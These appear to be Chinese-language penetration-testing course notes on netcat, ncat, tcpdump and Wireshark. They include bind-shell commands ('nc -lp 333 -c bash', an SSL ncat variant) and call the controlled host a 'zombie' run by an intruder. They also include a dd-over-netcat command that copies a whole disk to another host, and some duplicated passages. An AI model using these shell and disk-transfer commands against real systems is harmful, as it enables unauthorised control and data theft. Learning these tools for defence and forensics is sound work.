常用工具

NETCAT --NC：

几百K文件大小

侦听模式/传输模式

Telnet/获取banner信息

传输文本信息

传输文本/目录

加密传输文件

远程控制/木马

加密所有流量

流媒体服务器

远程克隆硬盘

Telnet：nc -nv ip 端口

tcpdump 

Linux Unix 默认安装的命令行的抓包工具

-i 指定接口

-s 指定大小

-w 指定保存到哪个文件

0 完整大小

抓包命令

tcpdump -i eth0 -s  0  -w a.cap

查看命令

tcpdump -r a.cap 显示摘要信息

tcpdump -r -a a.cap 显示详细内容（assical码） 

高级筛选

tcpdump -A -n 'tcp[13] = 24' -r http.cap

ncat 弥补了nc连接后肉鸡对入侵者缺乏认证，谁都可以通过端口进行控制它的缺点

ncat -c bash --allow 1.1.1.1 -vnl 333 --ssl      被控制端， --allow：只允许特定的ip访问它，ssl：加密

ncat -nv 10.1.1.1 333 -ssl

控制端

bash：linux下sh

客户端或者服务器端打开bash任意一个在它的之前的命令后加 -c bash  谁加这个参数谁就是被控制端（windows系统为 -c cmd）

服务器端  nc -lp 333 -c bash  被控制端

客户端   nc -nv 1.1.1.1 333 控制端

-c bash    跟对方建立自己的shell连接 即成为被控制端

一般侦听端口的为服务器端 

NC-流媒体服务

A：cat 1.MP4 | nc -lp 333

B： nc - nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000-

数据从A端源源不断的流向B端，B端每次缓存3000字节，B端不生成文件A端流多少播多少直到结束

NC -端口扫描

-z  :   扫描模式探测端口，挨个发送I/o进行探测 

默认TCP协议所以默认也是TCP端口，UDP 加一个-u参数

NC -远程硬盘克隆 

dd：深度拷贝磁盘每个扇区每个磁道都会拷贝即使是已经标记删除但没有覆盖的扇区，块级别复制

dd if=path1 of=path2 

将if对应路径的内容输出给of对应的路径

如：

A:nc -lp 333 |dd of=/dev/sda

B:dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

将主机B的sda磁盘通过nc传送给主机A

nc -n 后接IP地址不能接域名没有DNS解析

nc -nv 1.1.1.1 110

nc -nv 1.1.1.1 25

nc -nv 1.1.1.1 80

Wireshark拥有强大的过滤器引擎，用户可以使用过滤器筛选出有用的数据包，排除无关信息的干扰

Wireshark主窗口的设计包括3个面板：Packet List、Packet Details、Packet Bytes

下面介绍每个面板的内容。

Packet List(数据包列表): 最上面的面板用表格显示了当前不惑文件中的所有数据包，其中包括了数据包序号、数据包被捕获的相对时间、数据包的源地址和目的地址、数据包的协议以及在数据包中找到的概况信息等列。

Packet Details(数据包细节): 中间的面板分层地显示了一个数据包中地内容，并且可以通过展开或是收缩来显示这个数据包中所捕获地全部内容。

Packet Bytes(数据包字节): 最下面的面板可能是最令人困惑地，因为它显示了一个数据包未经处理地原始样子，也就是其在链路上传播时地样子。这些原始数据看上去一点都不舒服而且不容易理解。

Wireshark拥有强大的过滤器引擎，用户可以使用过滤器筛选出有用的数据包，排除无关信息的干扰

Wireshark主窗口的设计包括3个面板：Packet List、Packet Details、Packet Bytes

下面介绍每个面板的内容。

Packet List(数据包列表): 最上面的面板用表格显示了当前不惑文件中的所有数据包，其中包括了数据包序号、数据包被捕获的相对时间、数据包的源地址和目的地址、数据包的协议以及在数据包中找到的概况信息等列。

Packet Details(数据包细节): 中间的面板分层地显示了一个数据包中地内容，并且可以通过展开或是收缩来显示这个数据包中所捕获地全部内容。

Packet Bytes(数据包字节): 最下面的面板可能是最令人困惑地，因为它显示了一个数据包未经处理地原始样子，也就是其在链路上传播时地样子。这些原始数据看上去一点都不舒服而且不容易理解。

过程文档记录：

Dradis

Keepnote

Truecrypt

TCPDUMP是Unix、Linux自带的工具，纯命令行

Tcpdump -r file.pcap

UDP面向无连接，不负责是否到达。

TCP需要确认收到，面向连接。

TCP三次握手。SYN—>SYN、ACK—>ACK

DNS 递归查询。

HTTP 三层IP 四层TCP Decode as HTTP。

抓包分析，包头。

nc缺乏加密和身份验证的能力

ncat包含于nmap工具包中

不同系统/平台的nc参数功能不尽相同，弥补nc的不足

Wireshark 抓包分析

网卡上的数据包 Interface List

使用混杂模式+抓包筛选器 

pcap 兼容性最好

筛选器：抓包、显示

远程控制

nc + 管道命令

nc -lp port -c bash

nc ipaddress port

一定程度上替代ssh

nc扫描作为辅助参考信息。

远程电子取证(硬盘克隆)，文件克隆：文件名标记为被删除。

nc调用dd硬盘级别块级别的克隆。

nc -lp | dd of=/deb/sda

dd if=/deb/sda | nc -nv ipaddress port -a 1

文档过程记录

·Dradis

 ·短期临时小团队资源共享

 ·各种插件导入文件

·Keepnote

·Truecrypt

信息统计

菜单下的statistics

统计节点数/协议分布/包大小分布/会话连接/解码方式

Summary：数据包摘要信息

Endpoints：查看数据包列表里一共有多少ip地址通信

Ethernet 2： 二层包头  可排序可看哪个ip大量发送接收包

Protocol hierarchy：查看什么类型的协议包占比

Packet length：按包的长度查看流量

Conversations：查看通讯的机器之间流量

wireshark实践

抓包对比nc、ncat加密与不加密的流量

例：NC的传输

A端：nc -lp 333 -c bash 

B端：nc -nv 10.1.1.11 333

B端执行ls pwd等命令

使用wireshark Follow TCP Stream 可查看到传输内容

例：Ncat传输

A端：ncat -nvl 333 -c bash --ssl

B端：ncat -nv 10.1.1.11 333 --ssl

使用wireshark Follow TCP Stream 只能看到少量ncat特征信息

常见协议包与TCP
TCP面向连接的协议
UDP无连接，只发送不确认是否接收到

建立连接的过程：三次握手

1、发送syn包  
2、目标返回syn.ack
3、发送ack

每传一定量数据都有ack确认

·DNS协议

四层基于udp协议之上的一个应用层协议

·http

[Expert Info]：wireshark提供的辅助信息 不是包里的具体包头内容

·ftp

访问非标准端口：
decode as   以xx协议来进行解包

·数据流

在一个视图里查看完整的数据过程

在一个数据包上右键-Follow TCP Stream   查看TCP的流

http smtp Pop3 都可以查看

pop3使用base64编码

·SSL通信过程：密文
Follow SSL stream
同样是四层基于tcp
应用层是SSL

最开始的那几个数据包也是要进行SSL的公钥传输以及加密密钥的交换
这个时候公钥证书会以明文的方式从服务器端传到客户端 
然后客户端再随机产生一个后续会话加密用的对称密钥 
然后再用这个证书里面的公钥对这个会话密钥进行加密传给服务器 
然后这样就完成一个加密密钥的交换 然后在进行后续的数据传输

ARP、SSDP、DNS 、Http、FTP等等

都是分层显示的
如ARP
第一层：包的汇总信息

第二层：以太网包头 目标 源地址 上层协议地址（第一层）占位字段

第三层：地址 以太网地址和ip地址进行转换 发送端mac ip 目标mac ip 

如SSDP

第三层：ip类型（ipv4） 头长度 

*：TCP和UDP 两种最常见的四层协议

NETCAT缺陷

NC缺乏加密和身份验证能力

明文传输

服务器端易被嗅探，还原出数据交换内容，易被别人窃取内容

Ncat:

Ncat 包含于nmap工具包中，可以弥补nc加密及身份验证不足

A：ncat -c bash -allow ip地址 -vnl  333 --ssl

B: ncat -nv ip地址 333 --ssl

ssl： 加密管道

-allow IP地址 只允许目标IP控制

不同系统平台的nc参数不同

man 查询命令

nc -h或nc --help

WIRESHARK

抓包嗅探协议分析

安全专家必备的技能

抓包引擎

libpcap9 ——linux

winpcap10 ——windows

wireshark 对抓到的包进行解码

wireshark 筛选器

1.抓包筛选器

2.显示筛选器